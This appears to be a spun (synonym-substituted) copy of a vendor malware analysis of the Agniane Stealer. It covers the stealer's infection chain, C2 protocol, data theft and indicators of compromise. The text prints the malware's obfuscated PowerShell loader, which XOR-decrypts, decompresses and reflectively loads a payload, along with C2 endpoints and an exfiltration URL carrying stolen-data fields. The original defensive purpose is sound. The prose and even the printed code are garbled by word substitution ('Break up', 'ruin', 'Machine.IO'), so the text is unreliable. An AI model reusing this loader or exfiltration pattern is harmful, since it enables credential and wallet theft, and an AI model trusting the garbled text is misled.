[ad_1]
The Agniane Stealer is an information-stealing malware principally concentrated on the cryptocurrency wallets of its sufferers. It won reputation on the web beginning in August 2023. Just lately, we’ve got noticed a definite marketing campaign spreading it throughout our telemetry. Our fresh learn about has resulted in the a hit identity and detailed research of a in the past unrecognized community URL trend. Our researchers have just lately exposed additional information at the malware’s strategies for record assortment and the intricacies of its command and regulate (C2) protocol. We even have new opposite engineering insights into the malware’s structure and communique.
We consider our paintings contributes to tactical and operational ranges of intelligence relating to Agniane Stealer. It may turn out helpful from incident reaction to detector building and can be extra appropriate for a technical target market.
The Agniane Stealer has already been referenced in numerous articles. The Agniane stealer malware is being actively advertised and offered via a Telegram channel, obtainable at t[.]me/agniane. Attainable patrons could make purchases at once by the use of this channel by way of interacting with a specialised bot, named @agnianebot, which facilitates the transaction procedure and gives further details about the malware.” Our technical research signifies that it makes use of the ConfuserEx Protector and goals at similar objectives. Alternatively, it employs a definite C2 manner, in keeping with the pattern noticed in our telemetry knowledge. Due to this fact, we’ve got made up our minds to put up a technical research of the pattern.
Advent
All over our threat-hunting workout routines in November 2023, we’ve got spotted a trend of renamed PowerShell binaries, known as passbook.bat.exe. On nearer inspection of the host machines, we’ve got known infections of the newly came upon malware circle of relatives of Agniane Stealer. Danger study Gameel Ali (@MalGamy12) first disclosed the lifestyles of this malware on their X account. Researchers from the Zscaler ThreatLabz Group [2] and Pulsedive Danger Researchers [3] ultimately adopted up with weblog posts of their very own. Our paintings goals to give a contribution additional info working out campaigns involving the usage of Agniane Stealer.
Execution Chain
The infections we detected appear to begin with the downloading of ZIP recordsdata from compromised internet sites. The entire internet sites from the place we’ve got observed the obtain of this record in our telemetry are customary internet sites with respectable content material. All obtain URLs had the underneath URL trend:
http[s]://<area identify>/book_[A-Z0-9]+-d+.zip
As soon as downloaded and extracted, the downloaded ZIP record drops a BAT record (passbook.bat) and further ZIP record at the record gadget. The BAT record incorporates an obfuscated payload and after its execution via cmd.exe, it drops an executable which is renamed model of PowerShell binary (passbook.bat.exe). [4]
This enamed PowerShell used to be used to execute collection of obfuscated instructions.
passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat’).Break up([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); ruin; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Exchange($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Duration – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object Machine.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object Machine.IO.MemoryStream;$_CASH_QbnHO = New-Object Machine.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))
The command line proven above plays the next movements:
- Reads the content material of the in the past extracted BAT record (passbook.bat).
- Via string fits and replacements, builds the payload dynamically and assigns it to a variable.
- Transformed payload and static key from Base64 to a byte array.
- XOR’d the payload the usage of a static key.
- Decompressed XOR’d payload the usage of GZIP.
- Invokes payload after reflectively loading it into reminiscence.
To grasp movements taken towards the target, we reversed the payload.
Binary Research
The invoked payload continues with the execution of a C# meeting. We now have dumped it right into a record, the place we get the executable with underneath hash,
5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.
At time of the research, the record used to be unknown to on-line sandboxes. We now have made up our minds to emulate the process at the Cisco Protected Malware Analytics sandbox with the generic settings in this record, which is the second one degree of the deployment of the stealer. The dynamic research may now not be finished as we didn’t execute the primary degree of the pattern of the malware. Due to this fact, we made up our minds to research the pattern manually, the place we discovered later there are anti-sandbox ways used.
The binary record used to be extremely obfuscated with regulate go with the flow manipulations, like ConfuserEx.
You will need to be aware that the pattern didn’t include a signature for ConfuserEx, but it had an obfuscation manner that resembled it.
After reversing the pattern, we discovered it incorporates some other binary record in its sources segment, which have been getting reflectively loaded. The brand new binary used to be some other C#-based pattern, which contained the general payload. It used to be obfuscated with ConfuserEx with direct signatures.
As you’ll see from the former screenshot, it’s calling Invoke purposes from an access Level object, which incorporates a parsed useful resource.
All of the loading procedure seems as regardless that passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in flip, is working the tmp385C.tmp (tmp385C.tmp is only a header record identify) C# programs, which reflectively load the _CASH_78 C# utility. The general utility on this series is the Agniane Stealer:
Command and Regulate
The Agniane Stealer operates in an easy but environment friendly means, stealing credentials and recordsdata from the endpoint the usage of a fundamental C2 protocol. To begin with, it verifies the provision of any domains via a easy C# internet request, checking if the go back worth is “13.” This time request used to be made to a URL classified “check,” as an example.
WebClient wc = new WebClient();
urlData = wc.DownloadString(“https://trecube[.]com/check”); If urlData == “13” { list_of_active_c2.Upload(“trecube[.]com”) proceed; } |
In our pattern, we will be able to see the next IOCs (signs of compromise) offered in sources record:
trecube[.]com
trecube13[.]ru
imitato23[.]retailer
wood100home[.]ru
For a lot of these domain names, the pattern is looking for a check URL.
Later, the malware calls C2 to get an inventory of record extensions to search for. That is situated at URL trend getext?identification= adopted by way of an ID – part of sources of the _CASH_78 record. In this web site, the listing of extensions is separated by way of a semicolon, and as an example on a web site trecube[.]retailer it seems like:
*.txt; *.document; *.docx; *.pockets; *seed* |
Once more, that is treated as earlier checking string within the code. It’s parsed/cut up by way of semicolon and an inventory of extensions is created in an inventory of variables in C# code.
Due to this fact, the malware requests a faraway json record containing the main points about mistakes, VirusTotal hits, and so forth. In line with this data, the pattern both progresses or halts. We selected to center of attention our investigation on different sides which can be extra at once related to attribution and detection settings. Alternatively, you will need to be aware that the URL trend can be used for monitoring malware via telemetry or on-line sandbox services and products for OSINT functions. The URL seems like:
hxxps://trecube13[.]ru/getjson?identification=67 |
And right here what its corresponding output seems like:
{
“debug”: “0”, “emulate”: “0”, “virtualbox”: “1”, “virustotal”: “0”, “error”: “0”, “errorname”: “NONE”, “errortext”: “NONE” “competitor”: “0” } |
The following degree comes to enumeration and assortment. It scans the pc to assemble all paperwork with specified extensions recommended by way of the URL with a “getext” trend, along side different credentials present in not unusual paths of the working gadget, equivalent to Mozilla Firefox garage, Chrome garage and stored Home windows credentials. It is a not unusual process among news stealer malware. Moreover, Agniane used to be checking to look the localization surroundings of the sufferer pc. If it incorporates any of the language applications underneath, it does now not continue with the an infection,
ru-RU
kk-KZ ro-MD uz-UZ be-BY az-Latn-AZ hy-AM ky-KG tg-Cyrl-TJ |
The allowlisting of a few areas too can imply the developer does now not wish to assault particular areas. In line with different observations it’s imaginable to be expecting the attacker is from a rustic with a powerful diplomatic tie to Russia.
As soon as the entire goal recordsdata are accumulated, the malware creates a ZIP archive beneath the “native utility knowledge” folder,
C:Customers[user]AppDataLocal[A-Z0-9]{32}
Underneath is the construction/content material of this archive record
Agniane Stealer.txt //added as attachement right here
Installe Apps.txt //added as attachement right here PC Data.txt //added as attachement right here Information from Desktop //FOLDER – incorporates exfiltrated recordsdata from Desktop folder Information from … //FOLDER – incorporates exfiltrated recordsdata from …
… //and different folders, which include exfiltrated recordsdata. |
It’s later uploaded to
https://trecube[.]com/gate?identification=67&construct=BAT&passwords=0&cookies=124&username=johnny&nation=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0 |
Underneath you’ll to find the illustrated model of the Agniane Stealer’s C2 communique,
Different TTPs
The Agniane Stealer used to be additionally observed appearing following movements:
- Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for put in programs, it additionally collects this data.
- Checking for a public IP on a ip-api.com, i.e,
https://ip-api.com/json/?fields=11827 - Dumping Bitcoin and different cryptocurrency wallets
- Acting (now not smartly) exams to look if it’s working in a debugged or digital env. and so forth.
- Accumulating pockets.dat recordsdata.
- Enumerating Profile and Person knowledge.
- Accumulating saved bank cards.
- Including different malware like NGenTask.exe.log (the record with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).
Conclusion
The Agniane Stealer tries to stay undetected via quite a lot of obfuscation and anti-VM/debug ways. It reveals not unusual habits for stealers equivalent to gathering and exfiltrating recordsdata, credentials password, bank card main points, wallets, and so forth. Its evasive nature and concentrated on of quite a lot of news may draw in extra adversaries in long term to leverage its services and products.
Kill Chain
Kill Chain | Task | TTP |
Weaponization | Use of PowerShell, ZIP record, batch record | T1059.005 T1059.001 |
Supply | ZIP record downloaded by way of the browser | T1204.002 |
Use of compromised internet sites | T1584.004 | |
Exploitation | Working Obfuscated PowerShell payload | T1059.001 T1027.010 |
PowerShell decrypts payload the usage of XOR and decompress the usage of Gunzip | T1140 T1059.001 |
|
Reflective loading of the payload via Powershell | T1059.001 T1204.002 T1620 |
|
Use of Renamed PowerShell | T1036.003 | |
Set up | ||
Command and Regulate | ||
Movements on Goals | Number of quite a lot of news from the host | T1119 |
Concentrated on of credentials | T1555 |
Signs of Compromise
Kind | Degree | IOC (signs of compromise) |
Document Hash | Supply | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df |
Document Hash | Supply | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574 |
Document Hash | Supply | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87 |
Area | C2 | trecube[.]com |
Area | C2 | trecube[.]retailer |
Area | C2 | trecube13[.]ru |
Area | C2 | imitato23[.]retailer |
Area | C2 | wood100home[.]ru |
References
[1] https://twitter.com/MalGamy12/standing/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://weblog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer
We’d love to listen to what you suppose. Ask a Query, Remark Underneath, and Keep Hooked up with Cisco Safety on social!
Cisco Safety Social Channels
Percentage:
[ad_2]